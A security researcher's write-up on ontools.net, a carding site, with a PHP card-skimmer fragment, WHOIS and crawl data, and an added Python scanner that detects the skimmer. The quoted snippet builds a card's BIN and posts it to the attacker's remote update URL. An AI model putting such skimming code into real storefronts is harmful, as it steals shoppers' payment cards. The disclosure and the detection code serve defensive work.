ontools.net research
06-06-2017
On 06-28-2017 I completed my research and alerted the hosting provider to the malicious site. They removed the site, so it no longer poses a threat.
On 12-09-2017, after finding a new hosting provider and re-setting up, I was able to alert the new provider and he's been suspended again.
On 03-20-2018, after finding a new hosting provider and re-setting up, I was able to alert the new provider and he's been suspended for a third time.
In June of 2017, while researching a compromised website, I came across ontools.net in a snippet of bad code. After doing some investigative work, I discovered the website is used to automatically and manually collect credit card numbers, then used as a resale market where someone can purchase the card numbers using Bitcoin and Perfect Money.
I signed up for the site and began to explore a bit. It appears it's well developed, but incomplete; many of the features listed simply don't work or are missing. I didn't attempt to purchase any cards because, you know, felonies, so I can't confirm that it's actually working, but they do have a pretty extensive list of cards available in their store.
Below I've included their code snippet, a few things I discovered on their site, and screenshots of the app.

Code Snippets

    $update = "http://magento.ontools.net/update";
    $binCC = substr($data['cc_number'], 0, 6);
    $subject = "Verify Mag ".$data['cc_type']." ".$binCC." ".$_SERVER['SERVER_NAME']." ".$a->geoplugin_countryName;
    $xupdate = "data=".$datasend."&subject=".$subject."&server=".$_SERVER['SERVER_NAME'];

Notable data
IP: 188.241.58.16
Host: thcservers.com
Cpanel: http://ontools.net:2082

WHOIS data
Domain Name: ONTOOLS.NET
Registry Domain ID: 1990106061_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2016-01-08T15:55:13.00Z
Creation Date: 2015-12-28T15:53:37.00Z
Registrar Registration Expiration Date: 2018-12-28T15:53:37.00Z
Registrant Name: WHOIS AGENT
Registrant Organization: WHOIS PRIVACY PROTECTION SERVICE, INC

Crawl Data
/
/member.php
/register.php
/resetpass.php
/icq:699623489
/assets
/assets/css
/assets/css/main-style.css
/assets/css/style.css
/assets/css/styles.css
/assets/js
/assets/js/cekpass.js
/assets/js/jquery-1.3.2.min.js
/assets/js/jquery.backgroundPosition.js
/assets/js/marquee.js
/assets/img
/assets/img/background.gif
/assets/img/foreground.png
/assets/img/logo.png
/assets/img/midground.png
/assets/img/user.jpg
/assets/plugins
/assets/plugins/bootstrap/
/assets/plugins/dataTables/
/assets/plugins/flot/
/assets/plugins/jquery-1.10.2.js
/assets/plugins/metisMenu/
/assets/plugins/morris/
/assets/plugins/pace/
/assets/plugins/social-buttons/
/assets/plugins/timeline/
/assets/scripts
/assets/scripts/dashboard-demo.js
/assets/scripts/flot-demo.js
/assets/scripts/morris-demo.js
/assets/scripts/siminta.js
/assets/font-awesome
/assets/font-awesome/css/
/assets/font-awesome/fonts/

Screen Shots
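
Added example, not part of the original write-up and not code from the site: a Python triage scanner for the pattern shown under Code Snippets above. It goes beyond the exact snippet by also flagging the same combination of behaviours under a different domain; the indicator names, the scoring rule and the sample strings are assumptions constructed for illustration.

```python
import os
import re

# Indicators specific to the snippet quoted in this write-up.
PAGE_IOCS = {
    "ontools_host": re.compile(r"\bontools\.net\b", re.I),
    "verify_mag_subject": re.compile(r"Verify Mag\b"),
}
# Behaviours the snippet combines; assumed to survive a change of domain.
BEHAVIOURS = {
    "reads_card_field": re.compile(r"\[\s*['\"]cc_(?:number|cid|exp\w*)['\"]\s*\]"),
    "bin_extraction": re.compile(r"substr\s*\(\s*\$\w+\[\s*['\"]cc_number['\"]\s*\]\s*,\s*0\s*,\s*6\s*\)"),
    "hardcoded_url": re.compile(r"[\"']https?://[^\"'\s]+[\"']"),
    "server_name_tag": re.compile(r"\$_SERVER\[\s*['\"]SERVER_NAME['\"]\s*\]"),
    "geoplugin_lookup": re.compile(r"geoplugin_\w+"),
}

def scan_php(source):
    """Return (verdict, matched indicator names) for one PHP source string."""
    iocs = sorted(n for n, rx in PAGE_IOCS.items() if rx.search(source))
    seen = sorted(n for n, rx in BEHAVIOURS.items() if rx.search(source))
    if iocs:
        verdict = "known-ioc"
    elif {"reads_card_field", "hardcoded_url"} <= set(seen) and len(seen) >= 3:
        verdict = "suspicious"  # card field + fixed remote URL + one more trait
    else:
        verdict = "clean"
    return verdict, iocs + seen

def scan_tree(root):
    """Yield (path, verdict, hits) for each non-clean .php file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    verdict, hits = scan_php(fh.read())
                if verdict != "clean":
                    yield path, verdict, hits

# Constructed inputs: two lines of the page's snippet, a renamed variant, benign code.
FROM_PAGE = r'''$update = "http://magento.ontools.net/update";
$binCC = substr($data['cc_number'], 0, 6);'''
VARIANT = r'''$u = "https://collector.example.invalid/in";
$bin = substr($payment['cc_number'], 0, 6);
$q = "d=".$blob."&s=".$_SERVER['SERVER_NAME'];'''
BENIGN = r'''$order->setCcLast4(substr($data['cc_number'], -4));'''

if __name__ == "__main__":
    print([scan_php(s)[0] for s in (FROM_PAGE, VARIANT, BENIGN)])
```

Legitimate payment modules also read card fields and call fixed URLs, so treat a `suspicious` verdict as a prompt to diff the file against a clean copy of the module, not as proof of compromise.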










